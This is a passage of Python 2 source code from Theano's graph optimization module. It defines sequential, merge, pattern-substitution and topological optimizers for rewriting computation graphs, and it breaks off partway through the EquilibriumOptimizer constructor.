sequentially.
"""
@staticmethod
def warn(exc, self, optimizer):
"""Default failure_callback for SeqOptimizer
"""
_logger.error("SeqOptimizer apply %s" % str(optimizer))
_logger.error("Traceback:")
_logger.error(traceback.format_exc())
if config.on_opt_error == 'raise':
raise exc
def __init__(self, *opts, **kw):
"""WRITEME"""
if len(opts) == 1 and isinstance(opts[0], (list, tuple)):
opts = opts[0]
self[:] = opts
self.failure_callback = kw.pop('failure_callback', None)
def apply(self, fgraph):
"""WRITEME
Applies each L{Optimizer} in self in turn.
"""
l = []
if fgraph.profile:
validate_before = fgraph.profile.validate_time
nb_node_before = len(fgraph.apply_nodes)
sub_profs = []
for optimizer in self:
try:
t0 = time.time()
sub_prof = optimizer.optimize(fgraph)
l.append(float(time.time() - t0))
sub_profs.append(sub_prof)
except AssertionError:
# do not catch Assertion failures
raise
except Exception, e:
if self.failure_callback:
self.failure_callback(e, self, optimizer)
continue
else:
raise
if config.time_seq_optimizer:
print "SeqOptimizer",
if hasattr(self,"name"): print self.name,
elif hasattr(self,"__name__"): print self.__name__,
print " time %.3fs for %d/%d nodes before/after optimization"%(sum(l),nb_node_before,len(fgraph.apply_nodes))
print " time %.3fs for validate " % (
fgraph.profile.validate_time - validate_before)
ll=[]
for opt in self:
if hasattr(opt,"__name__"):
ll.append((opt.__name__,opt.__class__.__name__))
else:
ll.append((opt.name,opt.__class__.__name__))
lll=zip(l,ll)
def cmp(a,b):
if a[0]==b[0]: return 0
if a[0]<b[0]: return -1
return 1
lll.sort(cmp)
for (t, opt) in lll[::-1]:
print ' %.6fs - %s' % (t, opt)
print
if fgraph.profile:
validate_time = fgraph.profile.validate_time - validate_before
else:
validate_time = None
return (self, l, validate_time, nb_node_before,
len(fgraph.apply_nodes), sub_profs)
def __eq__(self, other):
#added to override the list's __eq__ implementation
return id(self) == id(other)
def __neq__(self, other):
#added to override the list's __neq__ implementation
return id(self) != id(other)
def __str__(self):
return "SeqOpt(%s)" % list.__str__(self)
def __repr__(self):
return list.__repr__(self)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
name = getattr(self, 'name', None)
print >> stream, "%s%s %s id=%i" % (
(' ' * level), self.__class__.__name__, name, id(self))
# This way, -1 will do all depth
if depth != 0:
depth -= 1
for opt in self:
opt.print_summary(stream, level=(level + 2), depth=depth)
@staticmethod
def print_profile(stream, prof, level=0):
(opts, prof, validate_time, nb_node_before,
nb_node_after, sub_profs) = prof
blanc = (' ' * level)
print >> stream, blanc, "SeqOptimizer",
if hasattr(opts, "name"):
print >> stream, blanc, opts.name,
elif hasattr(opts, "__name__"):
print >> stream, blanc, opts.__name__,
print >> stream, (" time %.3fs for %d/%d nodes"
" before/after optimization" % (
sum(prof), nb_node_before, nb_node_after))
print >> stream, blanc, " %.3fs for fgraph.validate()" % (validate_time)
if level == 0:
print >> stream, blanc, " time - (name, class, index)"
ll = []
for opt in opts:
if hasattr(opt, "__name__"):
ll.append((opt.__name__, opt.__class__.__name__,
opts.index(opt)))
else:
ll.append((opt.name, opt.__class__.__name__,
opts.index(opt)))
lll = zip(prof, ll)
def cmp(a, b):
if a[0] == b[0]:
return 0
elif a[0] < b[0]:
return -1
return 1
lll.sort(cmp)
for (t, opt) in lll[::-1]:
#if t < 1:
# continue
print >> stream, blanc, ' %.6fs - %s' % (t, opt)
if sub_profs[opt[-1]]:
opts[opt[-1]].print_profile(stream, sub_profs[opt[-1]],
level=level + 1)
print >> stream
@staticmethod
def merge_profile(prof1, prof2):
"""
Merge 2 profiles returned by this class's apply() fct.
"""
new_t = []
new_l = []
new_sub_profile = []
#merge common(same object) opt
for l in set(prof1[0]).intersection(set(prof2[0])):
idx1 = prof1[0].index(l)
idx2 = prof2[0].index(l)
new_t.append(prof1[1][idx1] +
prof2[1][idx2])
new_l.append(l)
if hasattr(l, 'merge_profile'):
assert len(prof1[5][idx1]) == len(prof2[5][idx1])
new_sub_profile.append(l.merge_profile(prof1[5][idx1],
prof2[5][idx2]))
else:
new_sub_profile.append(None)
# merge not common opt
import StringIO
for l in set(prof1[0]).symmetric_difference(set(prof2[0])):
#The set trick above only works for the same-object optimizations.
#It doesn't work for equivalent optimizations.
#So we try to merge equivalent optimization here.
new_l_names = [o.name for o in new_l]
if l.name in new_l_names:
idx = new_l_names.index(l.name)
io1 = StringIO.StringIO()
io2 = StringIO.StringIO()
l.print_summary(io1)
new_l[idx].print_summary(io2)
if io1.read() == io2.read():
if l in prof1[0]:
p = prof1
else:
p = prof2
new_t[idx] += p[1][p[0].index(l)]
if hasattr(l, 'merge_profile'):
assert len(p[5][p[0].index(l)]) == len(new_sub_profile[idx])
new_sub_profile[idx] = l.merge_profile(
new_sub_profile[idx], p[5][p[0].index(l)])
else:
new_sub_profile[idx] = None
continue
if l in prof1[0]:
p = prof1
else:
p = prof2
new_t.append(p[1][p[0].index(l)])
idx = p[0].index(l)
new_l.append(l)
new_sub_profile.append(p[5][idx])
new_opt = SeqOptimizer(*new_l)
assert set(prof1[0]).issubset(set(new_l))
# assert set(prof2[0]).issubset(set(new_l))
assert len(new_t) == len(new_opt) == len(new_sub_profile)
return (new_opt, new_t, prof1[2] + prof2[2],
-1, -1, new_sub_profile)
class _metadict:
"""WRITEME"""
# dict that accepts unhashable keys
# uses an associative list
# for internal use only
def __init__(self):
self.d = {}
self.l = []
def __getitem__(self, item):
return self.get(item, None)
def __setitem__(self, item, value):
try:
self.d[item] = value
except Exception:
for i, (key, val) in enumerate(self.l):
if key == item:
self.l[i] = (item, value)
return
self.l.append((item, value))
def __delitem__(self, item):
if item in self.d:
del self.d[item]
else:
for i, (key, val) in enumerate(self.l):
if key == item:
del self.l[i]
return
raise KeyError(item)
def discard(self, item):
if item in self.d:
del self.d[item]
else:
for i, (key, val) in enumerate(self.l):
if key == item:
del self.l[i]
return
def get(self, item, default):
try:
return self.d[item]
except Exception:
for item2, value in self.l:
try:
if item == item2:
return value
if item.equals(item2):
return value
except Exception:
if item is item2:
return value
else:
return default
def clear(self):
self.d = {}
self.l = []
def __str__(self):
return "(%s, %s)" % (self.d, self.l)
class MergeFeature(object):
"""
Keeps track of variables in fgraph that cannot be merged together.
That way, the MergeOptimizer can remember the result of the last merge
pass on the fgraph.
"""
def on_attach(self, fgraph):
assert not hasattr(fgraph, 'merge_feature')
fgraph.merge_feature = self
## For constants
self.seen_constants = set()
# variable -> signature (for constants)
self.const_sig = _metadict()
# signature -> variable (for constants)
self.const_sig_inv = _metadict()
## For all variables
# Set of distinct (not mergeable) nodes
self.nodes_seen = set()
# Each element of scheduled is a list of list of (out, new_out) pairs.
# Each list of pairs represent the substitution needed to replace all
# the outputs of a node with the outputs of a replacement candidate.
# Each node can have several candidates. For instance, if "node" has
# 2 outputs, and there are 3 replacement candidates, we will have:
# self.scheduled = [
# [[(node.out1, cand1.out1), (node.out2, cand1.out2)],
# [(node.out1, cand2.out1), (node.out2, cand2.out2)],
# [(node.out1, cand3.out1), (node.out2, cand3.out2)]]]
self.scheduled = []
# List of (node, candidate) pairs, where we tried to replace node by
# candidate, but it failed. This is used to avoid infinite loops
# during the replacement phase.
self.blacklist = []
for node in fgraph.toposort():
self.on_import(fgraph, node)
def on_change_input(self, fgraph, node, i, r, new_r):
# If inputs to node change, it is not guaranteed that it is distinct
# from the other nodes in nodes_seen
if node in self.nodes_seen:
self.nodes_seen.discard(node)
self.process_node(fgraph, node)
if isinstance(new_r, graph.Constant):
self.process_constant(fgraph, new_r)
def on_import(self, fgraph, node):
for c in node.inputs:
if isinstance(c, graph.Constant):
self.process_constant(fgraph, c)
self.process_node(fgraph, node)
def on_prune(self, fgraph, node):
self.nodes_seen.discard(node)
for c in node.inputs:
if isinstance(c, graph.Constant) and (len(c.clients) <= 1):
# This was the last node using this constant
sig = self.const_sig[c]
self.const_sig.discard(c)
self.const_sig_inv.discard(sig)
self.seen_constants.discard(id(c))
def process_constant(self, fgraph, c):
"""Check if a constant can be merged, and queue that replacement"""
if id(c) in self.seen_constants:
return
sig = c.signature()
other_c = self.const_sig_inv.get(sig, None)
if other_c is not None:
# multiple names will clobber each other..
# we adopt convention to keep the last name
if c.name:
other_c.name = c.name
self.scheduled.append([[(c, other_c)]])
else:
#this is a new constant
self.const_sig[c] = sig
self.const_sig_inv[sig] = c
self.seen_constants.add(id(c))
def process_node(self, fgraph, node):
"""Check if a node can be merged, and queue that replacement."""
if node in self.nodes_seen:
return
# These asserts ensure that the fgraph has set the clients field properly.
# The clients should at least contain `node` itself!
if node.inputs:
assert len(node.inputs[0].clients) > 0
assert (node, 0) in node.inputs[0].clients
merge_candidates = [c for (c, i) in node.inputs[0].clients
if c in self.nodes_seen]
else:
merge_candidates = []
replacement_candidates = []
for candidate in merge_candidates:
if candidate is node:
continue
if len(node.inputs) != len(candidate.inputs):
continue
inputs_match = all(node_in is cand_in
for node_in, cand_in in zip(node.inputs, candidate.inputs))
if inputs_match and node.op == candidate.op:
if (node, candidate) in self.blacklist:
# They were already tried, and there was an error
continue
# Schedule transfer of clients from node to candidate
pairs = zip(node.outputs, candidate.outputs)
#transfer names
for node_output, cand_output in pairs:
#clobber old name with new one
#it's arbitrary... one of the names has to go
if node_output.name:
cand_output.name = node_output.name
replacement_candidates.append(pairs)
if replacement_candidates:
self.scheduled.append(replacement_candidates)
else:
self.nodes_seen.add(node)
class MergeOptimizer(Optimizer):
"""
Merges parts of the graph that are identical and redundant.
The basic principle is that if two Applies have ops that compare equal, and
identical inputs, then they do not both need to be computed. The clients of
one are transferred to the other and one of them is removed from the graph.
This procedure is carried out in input->output order through the graph.
The first step of merging is constant-merging, so that all clients of an
int(1) for example, are transferred to a particular instance of int(1).
"""
def add_requirements(self, fgraph):
# Added by default
#fgraph.attach_feature(toolbox.ReplaceValidate())
if not hasattr(fgraph, 'merge_feature'):
fgraph.attach_feature(MergeFeature())
def apply(self, fgraph):
# Constant and non-constant are now applied in the same phase.
# I am not sure why, but it seems to be faster this way.
sched = fgraph.merge_feature.scheduled
while sched:
pairs_list = sched.pop()
success = True
for pairs in pairs_list:
try:
fgraph.replace_all_validate(pairs, 'Merge')
except InconsistencyError:
success = False
fgraph.merge_feature.blacklist.append(
(pairs[0][0].owner, pairs[0][1].owner))
if success:
break
# clear blacklist
fgraph.merge_feature.blacklist = []
merge_optimizer = MergeOptimizer()
def is_same_graph_with_merge(var1, var2, givens=None):
"""
Merge-based implementation of `theano.gof.graph.is_same_graph`.
See help on `theano.gof.graph.is_same_graph` for additional documentation.
"""
if givens is None:
givens = {}
# Copy variables since the MergeOptimizer will modify them.
copied = copy.deepcopy([var1, var2, givens])
vars = copied[0:2]
givens = copied[2]
# Create FunctionGraph.
inputs = theano.gof.graph.inputs(vars)
fgraph = theano.gof.fg.FunctionGraph(inputs, vars)
# Perform Variable substitution.
for to_replace, replace_by in givens.iteritems():
fgraph.replace(to_replace, replace_by)
# Perform merge optimization.
merge_optimizer.optimize(fgraph)
# When two variables perform the same computations, they will have the same
# owner in the optimized graph.
# We need to be careful with the special case where the owner is None,
# which happens when the graph is made of a single Variable.
# We also need to make sure we replace a Variable if it is present in
# `givens`.
vars_replaced = [givens.get(v, v) for v in vars]
o1, o2 = [v.owner for v in vars_replaced]
if o1 is None and o2 is None:
# Comparing two single-Variable graphs: they are equal if they are
# the same Variable.
return vars_replaced[0] == vars_replaced[1]
else:
return o1 is o2
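# Illustrative example (not in the original source), assuming symbolic tensor
# variables are available:
#   import theano.tensor as T
#   x = T.vector('x')
#   is_same_graph_with_merge(x + 1, x + 1)   # True: the two graphs merge
#   is_same_graph_with_merge(x + 1, x + 2)   # False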
def MergeOptMerge(opt):
"""WRITEME
Returns an Optimizer that merges the graph then applies the
optimizer in opt and then merges the graph again in case the
opt introduced additional similarities.
"""
merger = merge_optimizer
opt = SeqOptimizer([merger, opt, merger])
opt.name = "MergeOptMerge"
return opt
def pre_constant_merge(vars):
"""
Merge constants in the subgraph used to compute nodes in `vars`.
`vars` is a list of nodes, and we want to merge together nodes
that are constant inputs used to compute nodes in that list.
:note: This function will ignore nodes that are in an fgraph.
It is used to pre-merge nodes generated inside an optimization,
before it is inserted in the fgraph.
It is useful if there are many such replacements to make,
so that DebugMode will not check each of them.
"""
seen_var = set()
# signature -> variable (for constants)
const_sig_inv = {}
def recursive_merge(var):
if var in seen_var:
return var
if not hasattr(var, 'owner'):
return var
if var.owner and hasattr(var.owner, "fgraph"):
return var
seen_var.add(var)
if isinstance(var, graph.Constant):
sig = var.signature()
if sig in const_sig_inv:
return const_sig_inv[sig]
const_sig_inv[sig] = var
return var
if var.owner:
for idx, inp in enumerate(var.owner.inputs):
var.owner.inputs[idx] = recursive_merge(inp)
return var
return map(recursive_merge, vars)
########################
### Local Optimizers ###
########################
class LocalOptimizer(object):
"""A class for node-based optimizations.
Instances should implement the transform function,
and be passed to configure a fgraph-based Optimizer instance.
"""
def __hash__(self):
if not hasattr(self, '_optimizer_idx'):
self._optimizer_idx = _optimizer_idx[0]
_optimizer_idx[0] += 1
return self._optimizer_idx
def transform(self, node):
"""Transform a subgraph whose output is `node`.
Subclasses should implement this function so that it returns one of two
kinds of things:
- False to indicate that no optimization can be applied to this `node`;
or
- <list of variables> to use in place of `node`'s outputs in the
greater graph.
:type node: an Apply instance
"""
raise utils.MethodNotDefined("transform",
type(self), self.__class__.__name__)
def add_requirements(self, fgraph):
"""
If this local optimization wants to add some requirements to the fgraph,
This is the place to do it.
"""
# Added by default
#fgraph.attach_feature(toolbox.ReplaceValidate())
pass
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s id=%i" % (
(' ' * level), self.__class__.__name__, id(self))
class FromFunctionLocalOptimizer(LocalOptimizer):
"""WRITEME"""
def __init__(self, fn, tracks=None):
if tracks is None:
tracks = []
self.transform = fn
self._tracks = tracks
def tracks(self):
return self._tracks
def __str__(self):
return getattr(self, '__name__',
'<FromFunctionLocalOptimizer instance>')
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s id=%i" % (
' ' * level,
str(self.transform),
id(self))
def local_optimizer(*tracks):
def decorator(f):
"""WRITEME"""
rval = FromFunctionLocalOptimizer(f, tracks)
rval.__name__ = f.__name__
return rval
return decorator
class LocalOptGroup(LocalOptimizer):
"""WRITEME"""
def __init__(self, *optimizers):
self.opts = optimizers
self.reentrant = any(getattr(opt, 'reentrant', True)
for opt in optimizers)
self.retains_inputs = all(getattr(opt, 'retains_inputs', False)
for opt in optimizers)
def __str__(self):
return getattr(self, '__name__',
('<theano.gof.opt.LocalOptGroup instance>'
+ str([str(o) for o in self.opts])))
def transform(self, node):
for opt in self.opts:
repl = opt.transform(node)
if repl:
return repl
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s id=%i" % (
(' ' * level), self.__class__.__name__, id(self))
if depth != 0:
depth -= 1
for lopt in self.opts:
lopt.print_summary(stream, level=(level + 2), depth=depth)
class _LocalOpKeyOptGroup(LocalOptGroup):
"""WRITEME"""
def __init__(self, optimizers):
if any(not hasattr(opt, 'op_key') for opt in optimizers):
raise TypeError("All LocalOptimizers passed here must have an op_key method.")
LocalOptGroup.__init__(self, *optimizers)
def op_key(self):
return [opt.op_key() for opt in self.opts]
class OpSub(LocalOptimizer):
"""WRITEME
Replaces the application of a certain op by the application of
another op that take the same inputs as what they are replacing.
e.g. OpSub(add, sub) ==>
add(div(x, y), add(y, x)) -> sub(div(x, y), sub(y, x))
"""
# an OpSub does not apply to the nodes it produces
reentrant = False
# all the inputs of the original node are transferred to the outputs
retains_inputs = True
def __init__(self, op1, op2, transfer_tags=True):
"""
op1.make_node and op2.make_node must take the same number of
inputs and have the same number of outputs.
"""
self.op1 = op1
self.op2 = op2
self.transfer_tags = transfer_tags
def op_key(self):
return self.op1
def tracks(self):
return [[self.op1]]
def transform(self, node):
if node.op != self.op1:
return False
repl = self.op2.make_node(*node.inputs)
if self.transfer_tags:
repl.tag = copy.copy(node.tag)
for output, new_output in zip(node.outputs, repl.outputs):
new_output.tag = copy.copy(output.tag)
return repl.outputs
def __str__(self):
return "%s -> %s" % (self.op1, self.op2)
class OpRemove(LocalOptimizer):
"""WRITEME
Removes all applications of an op by transferring each of its
outputs to the corresponding input.
"""
reentrant = False # no nodes are added at all
def __init__(self, op):
self.op = op
def op_key(self):
return self.op
def tracks(self):
return [[self.op]]
def transform(self, node):
if node.op != self.op:
return False
return node.inputs
def __str__(self):
return "%s(x) -> x" % (self.op)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s(%s) id=%i" % (
' ' * level,
self.__class__.__name__,
str(self.op),
id(self))
class PatternSub(LocalOptimizer):
"""WRITEME
@todo update
Replaces all occurrences of the input pattern by the output pattern:
input_pattern ::= (op, <sub_pattern1>, <sub_pattern2>, ...)
input_pattern ::= dict(pattern = <input_pattern>,
constraint = <constraint>)
sub_pattern ::= input_pattern
sub_pattern ::= string
sub_pattern ::= a Constant instance
sub_pattern ::= int
sub_pattern ::= float
constraint ::= lambda fgraph, expr: additional matching condition
output_pattern ::= (op, <output_pattern1>, <output_pattern2>, ...)
output_pattern ::= string
output_pattern ::= int
output_pattern ::= float
Each string in the input pattern is a variable that will be set to
whatever expression is found in its place. If the same string is
used more than once, the same expression must be found in those
places. If a string used in the input pattern is used in the
output pattern, the matching expression will be inserted in its
place. The input pattern cannot just be a string but the output
pattern can.
If you put a constant variable in the input pattern, there will be a
match iff a constant variable with the same value and the same type
is found in its place.
You can add a constraint to the match by using the dict(...) form
described above with a 'constraint' key. The constraint must be a
function that takes the fgraph and the current Variable that we are
trying to match and returns True or False according to an
arbitrary criterion.
Examples:
PatternSub((add, 'x', 'y'), (add, 'y', 'x'))
PatternSub((multiply, 'x', 'x'), (square, 'x'))
PatternSub((subtract, (add, 'x', 'y'), 'y'), 'x')
PatternSub((power, 'x', Constant(double, 2.0)), (square, 'x'))
PatternSub((boggle, {'pattern': 'x',
'constraint': lambda expr: expr.type == scrabble}),
(scrabble, 'x'))
"""
def __init__(self, in_pattern, out_pattern, allow_multiple_clients=False,
skip_identities_fn=None, name=None, pdb=False):
"""
Creates a PatternSub that replaces occurrences of
in_pattern by occurrences of out_pattern.
:param in_pattern: the input pattern that we want to replace
:param out_pattern: the replacement pattern
:param allow_multiple_clients: if False, the pattern matching will fail
if one of the subpatterns has more than
one client.
:param pdb: if True, we invoke pdb when the first node in the
pattern match.
"""
self.in_pattern = in_pattern
self.out_pattern = out_pattern
if isinstance(in_pattern, (list, tuple)):
self.op = self.in_pattern[0]
elif isinstance(in_pattern, dict):
self.op = self.in_pattern['pattern'][0]
else:
raise TypeError("The pattern to search for must start with "
"a specific Op instance.")
self.__doc__ = (self.__class__.__doc__
+ "\n\nThis instance does: "
+ str(self) + "\n")
self.allow_multiple_clients = allow_multiple_clients
self.skip_identities_fn = skip_identities_fn
if name:
self.__name__ = name
self.pdb = pdb
def skip_identities(self, expr):
if self.skip_identities_fn:
return self.skip_identities_fn(expr)
def op_key(self):
return self.op
def tracks(self):
def helper(pattern, sofar):
if isinstance(pattern, (list, tuple)):
sofar = sofar + (pattern[0],)
return reduce(tuple.__add__,
tuple(helper(p, sofar) for p in pattern[1:]),
())
elif isinstance(pattern, dict):
return helper(pattern['pattern'], sofar)
else:
return (sofar,)
return set(helper(self.in_pattern, ()))
def transform(self, node):
"""
Checks if the graph from node corresponds to in_pattern. If it does,
constructs out_pattern and performs the replacement.
"""
if node.op != self.op:
return False
def match(pattern, expr, u, allow_multiple_clients=False, pdb=False):
def retry_with_equiv():
expr_equiv = self.skip_identities(expr)
if expr_equiv is None:
return False
#TODO: Not sure how to handle multiple_clients flag
###print 'retrying match', pattern, expr_equiv
return match(pattern, expr_equiv, u,
allow_multiple_clients=allow_multiple_clients)
if isinstance(pattern, (list, tuple)):
if expr.owner is None:
return False
if (not (expr.owner.op == pattern[0])
or (not allow_multiple_clients
and len(expr.clients) > 1)):
return retry_with_equiv()
if len(pattern) - 1 != len(expr.owner.inputs):
return retry_with_equiv()
for p, v in zip(pattern[1:], expr.owner.inputs):
u = match(p, v, u, self.allow_multiple_clients)
if not u:
return False
elif isinstance(pattern, dict):
try:
real_pattern = pattern['pattern']
except KeyError:
raise KeyError(
"Malformed pattern: %s (expected key 'pattern')"
% pattern)
constraint = pattern.get('constraint', lambda expr: True)
if constraint(expr):
return match(real_pattern, expr, u,
pattern.get('allow_multiple_clients',
allow_multiple_clients))
else:
return retry_with_equiv()
elif isinstance(pattern, basestring):
v = unify.Var(pattern)
if u[v] is not v and u[v] is not expr:
return retry_with_equiv()
else:
u = u.merge(expr, v)
elif (isinstance(pattern, (int, float))
and isinstance(expr, graph.Constant)):
if numpy.all(
theano.tensor.constant(pattern).value == expr.value):
return u
else:
return retry_with_equiv()
elif (isinstance(pattern, graph.Constant)
and isinstance(expr, graph.Constant)
and pattern.equals(expr)):
return u
else:
return retry_with_equiv()
if pdb:
import pdb
pdb.set_trace()
return u
def build(pattern, u):
if isinstance(pattern, (list, tuple)):
args = [build(p, u) for p in pattern[1:]]
return pattern[0](*args)
elif isinstance(pattern, basestring):
return u[unify.Var(pattern)]
elif isinstance(pattern, (int, float)):
return pattern
else:
return pattern.clone()
u = match(self.in_pattern, node.out, unify.Unification(), True,
self.pdb)
if u:
p = self.out_pattern
new = build(p, u)
####print "PatternSub matched:", new
return [new]
else:
return False
def __str__(self):
if getattr(self, '__name__', None):
return self.__name__
def pattern_to_str(pattern):
if isinstance(pattern, (list, tuple)):
return "%s(%s)" % (
str(pattern[0]),
", ".join([pattern_to_str(p) for p in pattern[1:]]))
elif isinstance(pattern, dict):
return "%s subject to %s" % (
pattern_to_str(pattern['pattern']),
str(pattern.get('constraint', 'no conditions')))
else:
return str(pattern)
return "%s -> %s" % (
pattern_to_str(self.in_pattern),
pattern_to_str(self.out_pattern))
def __repr__(self):
return str(self)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
name = getattr(self, '__name__', getattr(self, 'name', None))
print >> stream, "%s%s %s(%s, %s) id=%i" % (
' ' * level,
self.__class__.__name__,
name,
str(self.in_pattern),
str(self.out_pattern),
id(self))
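# A minimal usage sketch, not part of the original module: `add` stands in for
# whatever commutative Op instance you want to rewrite and `fgraph` for an
# existing FunctionGraph -- both are assumptions here. A PatternSub is a
# LocalOptimizer, so it is normally wrapped in one of the navigators defined
# below and run through the base Optimizer entry point:
#
#     swap_args = PatternSub((add, 'x', 'y'), (add, 'y', 'x'), name='swap_args')
#     TopoOptimizer(swap_args).optimize(fgraph)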
##################
### Navigators ###
##################
# Use the following classes to apply LocalOptimizers
class NavigatorOptimizer(Optimizer):
"""Abstract class
"""
@staticmethod
def warn(exc, nav, repl_pairs, local_opt):
"""failure_callback for NavigatorOptimizer: print traceback
"""
_logger.error("Optimization failure due to: %s" % str(local_opt))
_logger.error("TRACEBACK:")
_logger.error(traceback.format_exc())
if isinstance(exc, AssertionError) or config.on_opt_error == 'raise':
raise exc
@staticmethod
def warn_inplace(exc, nav, repl_pairs, local_opt):
"""failure_callback for NavigatorOptimizer
ignore InconsistencyErrors, print traceback
"""
if isinstance(exc, InconsistencyError):
return
return NavigatorOptimizer.warn(exc, nav, repl_pairs, local_opt)
@staticmethod
def warn_ignore(exc, nav, repl_pairs, local_opt):
"""failure_callback for NavigatorOptimizer: ignore all errors
"""
pass
def __init__(self, local_opt, ignore_newtrees='auto',
failure_callback=None):
"""
:param local_opt: a LocalOptimizer to apply over a FunctionGraph
(or None is Ok too).
        :param ignore_newtrees:
            - True: new subgraphs returned by an optimization are not
              candidates for further optimization
            - False: new subgraphs returned by an optimization are candidates
              for further optimization
            - 'auto': let the local_opt set this parameter via its 'reentrant'
              attribute.
:param failure_callback:
a function that takes (exception, navigator, [(old, new),
(old,new),...]) and we call it if there's an exception.
If the trouble is from local_opt.transform(), the new variables
will be 'None'.
If the trouble is from validation (the new types don't match for
example) then the new variables will be the ones created by
transform().
If this parameter is None, then exceptions are not caught here
(raised normally).
"""
self.local_opt = local_opt
if ignore_newtrees == 'auto':
self.ignore_newtrees = not getattr(local_opt, 'reentrant', True)
else:
self.ignore_newtrees = ignore_newtrees
self.failure_callback = failure_callback
def attach_updater(self, fgraph, importer, pruner, chin=None):
"""
        Install some FunctionGraph listeners to help the navigator deal with
        the ignore_newtrees-related functionality.
        :param importer: function that will be called whenever
                         optimizations add stuff to the graph.
:param pruner: function to be called when optimizations remove stuff
from graph.
:param chin: "on change input" called whenever an node's inputs change.
:returns: The FunctionGraph plugin that handles the three tasks.
Keep this around so that you can detach later!
"""
if self.ignore_newtrees:
importer = None
if importer is None and pruner is None:
return None
class Updater:
if importer is not None:
def on_import(self, fgraph, node):
importer(node)
if pruner is not None:
def on_prune(self, fgraph, node):
pruner(node)
if chin is not None:
def on_change_input(self, fgraph, node, i, r, new_r):
chin(node, i, r, new_r)
u = Updater()
fgraph.attach_feature(u)
return u
def detach_updater(self, fgraph, u):
"""Undo the work of attach_updater.
:param u: a return-value of attach_updater
:returns: None.
"""
if u is not None:
fgraph.remove_feature(u)
def process_node(self, fgraph, node, lopt=None):
"""
This function will use `lopt` to `transform` the `node`. The
`transform` method will return either False or a list of Variables
that are intended to replace `node.outputs`.
If the fgraph accepts the replacement, then the optimization is
successful, and this function returns True.
If there are no replacement candidates or the fgraph rejects the
replacements, this function returns False.
:param fgraph: a FunctionGraph
:param node: an Apply instance in `fgraph`
:param lopt: a LocalOptimizer instance that may have a better idea for
how to compute node's outputs.
:rtype: Bool
:returns: True iff the `node`'s outputs were replaced in the `fgraph`.
"""
lopt = lopt or self.local_opt
try:
replacements = lopt.transform(node)
except Exception, e:
if self.failure_callback is not None:
self.failure_callback(e, self,
[(x, None) for x in node.outputs], lopt)
return False
else:
raise
if replacements is False or replacements is None:
return False
if not isinstance(replacements, (tuple, list)):
raise TypeError('Optimizer %s gave wrong type of replacement. '
'Expected list or tuple.' % lopt)
if len(node.outputs) != len(replacements):
raise ValueError('Optimizer %s gave wrong number of replacements'
% lopt)
# If an output would be replaced by itself, no need to perform
# the replacement
repl_pairs = [(r, rnew) for r, rnew in zip(node.outputs, replacements)
if rnew is not r]
if len(repl_pairs) == 0:
return False
try:
fgraph.replace_all_validate(repl_pairs, reason=lopt)
return True
except Exception, e:
# This means the replacements were rejected by the fgraph.
#
# This is not supposed to happen. The default failure_callback
# will print a traceback as a warning.
if self.failure_callback is not None:
self.failure_callback(e, self, repl_pairs, lopt)
return False
else:
raise
def add_requirements(self, fgraph):
super(NavigatorOptimizer, self).add_requirements(fgraph)
# Added by default
#fgraph.attach_feature(toolbox.ReplaceValidate())
if self.local_opt:
self.local_opt.add_requirements(fgraph)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s (%i)" % (
(' ' * level), self.__class__.__name__, id(self))
if depth != 0:
self.local_opt.print_summary(stream, level=(level + 2),
depth=(depth - 1))
class TopoOptimizer(NavigatorOptimizer):
"""WRITEME"""
def __init__(self, local_opt, order='in_to_out', ignore_newtrees=False,
failure_callback=None):
if order not in ['out_to_in', 'in_to_out']:
raise ValueError("order must be 'out_to_in' or 'in_to_out'")
self.order = order
NavigatorOptimizer.__init__(self, local_opt, ignore_newtrees,
failure_callback)
def apply(self, fgraph, start_from=None):
if start_from is None:
start_from = fgraph.outputs
q = deque(graph.io_toposort(fgraph.inputs, start_from))
def importer(node):
if node is not current_node:
q.append(node)
def pruner(node):
if node is not current_node:
try:
q.remove(node)
except ValueError:
pass
u = self.attach_updater(fgraph, importer, pruner)
try:
while q:
if self.order == 'out_to_in':
node = q.pop()
else:
node = q.popleft()
current_node = node
self.process_node(fgraph, node)
except Exception:
self.detach_updater(fgraph, u)
raise
self.detach_updater(fgraph, u)
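# Sketch of how the failure callbacks defined on NavigatorOptimizer are usually
# wired in (`some_local_opt` and `fgraph` are placeholders): passing one of the
# static `warn*` helpers keeps a single failing node from aborting the pass.
#
#     topo = TopoOptimizer(some_local_opt, order='out_to_in',
#                          failure_callback=NavigatorOptimizer.warn_inplace)
#     topo.optimize(fgraph)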
class OpKeyOptimizer(NavigatorOptimizer):
"""WRITEME"""
def __init__(self, local_opt, ignore_newtrees=False,
failure_callback=None):
if not hasattr(local_opt, 'op_key'):
raise TypeError("LocalOptimizer for OpKeyOptimizer must have "
"an 'op_key' method.")
NavigatorOptimizer.__init__(self, local_opt, ignore_newtrees,
failure_callback)
def apply(self, fgraph):
op = self.local_opt.op_key()
if isinstance(op, (list, tuple)):
q = reduce(list.__iadd__, map(fgraph.get_nodes, op))
else:
q = list(fgraph.get_nodes(op))
def importer(node):
if node is not current_node:
if node.op == op:
q.append(node)
def pruner(node):
if node is not current_node and node.op == op:
try:
q.remove(node)
except ValueError:
pass
u = self.attach_updater(fgraph, importer, pruner)
try:
while q:
node = q.pop()
current_node = node
self.process_node(fgraph, node)
except Exception:
self.detach_updater(fgraph, u)
raise
self.detach_updater(fgraph, u)
def add_requirements(self, fgraph):
"""
Requires the following features:
- NodeFinder
- ReplaceValidate(Added by default)
"""
super(OpKeyOptimizer, self).add_requirements(fgraph)
fgraph.attach_feature(toolbox.NodeFinder())
class ChangeTracker:
def __init__(self):
self.changed = False
def on_import(self, fgraph, node):
self.changed = True
def on_change_input(self, fgraph, node, i, r, new_r):
self.changed = True
def reset(self):
self.changed = False
def on_attach(self, fgraph):
fgraph.change_tracker = self
class EquilibriumOptimizer(NavigatorOptimizer):
def __init__(self,
optimizers,
failure_callback=None,
max_depth=None,
max_use_ratio=None):
"""
:param optimizers: list or set of local or global optimizations to
apply until equilibrium.
:param max_use_ratio: each optimizer can be applied at most
(size of graph * this number) times
:param max_depth: TODO what does this do? (EquilibriumDB sets it to 5)
"""
super(EquilibriumOptimizer, self).__init__(
None,
